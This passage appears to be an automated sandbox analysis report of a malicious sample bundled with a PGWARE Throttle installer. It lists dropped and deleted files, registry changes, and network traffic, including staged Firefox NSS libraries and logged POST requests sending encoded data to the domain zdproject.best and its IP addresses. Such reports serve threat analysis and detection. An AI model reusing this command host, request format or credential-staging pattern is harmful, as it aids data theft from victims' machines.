  668. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB01D.tmp.appcompat.txt",
  669. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB4E1.tmp.WERInternalMetadata.xml",
  670. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB501.tmp.hdmp",
  671. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD40.tmp.mdmp",
  672. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\WERB01D.tmp.appcompat.txt",
  673. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\WERB4E1.tmp.WERInternalMetadata.xml",
  674. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\WERB501.tmp.hdmp",
  675. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\WERBD40.tmp.mdmp",
  676. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\Report.wer",
  677. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\Report.wer.tmp"
  678.  
  679.  
  680. * Deleted Files:
  681. "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp\\4koTr0CX1Je1Yp8mra3YBZ.tmp",
  682. "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp",
  683. "C:\\Users\\user\\AppData\\Local\\Temp\\86867814736212939668321.tmp",
  684. "C:\\Users\\user\\AppData\\Local\\Temp\\87383125507293532077856.tmp",
  685. "C:\\Users\\user\\AppData\\Local\\Temp\\8738375678859424949995.tmp",
  686. "C:\\Users\\user\\AppData\\Local\\Temp\\87384063080549063902971.tmp",
  687. "C:\\Users\\user\\AppData\\Local\\Temp\\87384533265966878166663.tmp",
  688. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  689. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  690. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  691. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  692. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  693. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  694. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  695. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  696. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  697. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  698. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  699. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  700. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  701. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  702. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  703. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  704. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  705. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  706. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  707. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  708. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  709. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  710. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  711. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  712. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  713. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  714. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  715. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  716. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  717. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  718. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  719. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  720. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  721. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  722. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  723. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  724. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  725. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  726. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  727. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  728. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  729. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  730. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  731. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  732. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  733. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  734. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  735. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  736. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  737. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
  738. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-8UKGJ.tmp",
  739. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\is-FUI03.tmp",
  740. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-D8VAV.tmp",
  741. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-EOBJF.tmp",
  742. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-080PA.tmp",
  743. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-H79UP.tmp",
  744. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-H8S3C.tmp",
  745. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-ARK8K.tmp",
  746. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-P68A4.tmp",
  747. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-VASLS.tmp",
  748. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Help.lnk",
  749. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Help.pif",
  750. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Help.url",
  751. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Support.lnk",
  752. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Support.pif",
  753. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Support.url",
  754. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Update Throttle.lnk",
  755. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Update Throttle.pif",
  756. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Update Throttle.url",
  757. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\trees.bmp",
  758. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup\\_isdecmp.dll",
  759. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup\\_setup64.tmp",
  760. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup",
  761. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp",
  762. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_a47488466980088aa1a6cb1ec3416907.exe",
  763. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB01D.tmp",
  764. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB01D.tmp.appcompat.txt",
  765. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB4E1.tmp",
  766. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB4E1.tmp.WERInternalMetadata.xml",
  767. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB501.tmp",
  768. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB501.tmp.hdmp",
  769. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD40.tmp",
  770. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD40.tmp.mdmp",
  771. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\Report.wer.tmp"
  772.  
  773.  
  774. * Modified Registry Keys:
  775. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000",
  776. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner",
  777. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
  778. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
  779. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000",
  780. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash",
  781. "HKEY_LOCAL_MACHINE\\Software\\PGWARE\\Throttle",
  782. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\InstalledDate",
  783. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\InternetType",
  784. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\Name",
  785. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\Restore",
  786. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\Serial",
  787. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\SpeedSetting",
  788. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\Updated",
  789. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\UpdatedDate",
  790. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1",
  791. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Setup Version",
  792. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: App Path",
  793. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\InstallLocation",
  794. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Icon Group",
  795. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: User",
  796. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Selected Tasks",
  797. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Deselected Tasks",
  798. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Language",
  799. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\DisplayName",
  800. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\DisplayIcon",
  801. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\UninstallString",
  802. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\QuietUninstallString",
  803. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\DisplayVersion",
  804. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Publisher",
  805. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\URLInfoAbout",
  806. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\HelpLink",
  807. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\URLUpdateInfo",
  808. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\NoModify",
  809. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\NoRepair",
  810. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\InstallDate",
  811. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\MajorVersion",
  812. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\MinorVersion",
  813. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\VersionMajor",
  814. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\VersionMinor",
  815. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\EstimatedSize",
  816. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  817. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  818. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  819. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  820. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  821.  
  822.  
  823. * Deleted Registry Keys:
  824. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash",
  825. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000",
  826. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
  827. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
  828. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner"
  829.  
  830.  
  831. * DNS Communications:
  832.  
  833. "type": "A",
  834. "request": "zdproject.best",
  835. "answers":
  836.  
  837. "data": "194.67.90.124",
  838. "type": "A"
  839.  
  840.  
  841. "data": "176.119.159.222",
  842. "type": "A"
  843.  
  844.  
  845. "data": "185.173.178.138",
  846. "type": "A"
  847.  
  848.  
  849.  
  850.  
  851.  
  852. * Domains:
  853.  
  854. "ip": "194.67.90.124",
  855. "domain": "zdproject.best"
  856.  
  857.  
  858.  
  859. * Network Communication - ICMP:
  860.  
  861. * Network Communication - HTTP:
  862.  
  863. "count": 1,
  864. "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  865. "uri": "http://zdproject.best/index.php",
  866. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  867. "method": "POST",
  868. "host": "zdproject.best",
  869. "version": "1.1",
  870. "path": "/index.php",
  871. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: zdproject.best\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  872. "port": 80
  873.  
  874.  
  875. "count": 1,
  876. "body": "",
  877. "uri": "http://zdproject.best/index.php",
  878. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  879. "method": "POST",
  880. "host": "zdproject.best",
  881. "version": "1.1",
  882. "path": "/index.php",
  883. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: zdproject.best\r\nContent-Length: 65902\r\nCache-Control: no-cache\r\n\r\n",
  884. "port": 80
  885.  
  886.  
  887.  
  888. * Network Communication - SMTP:
  889.  
  890. * Network Communication - Hosts:
  891.  
  892. * Network Communication - IRC: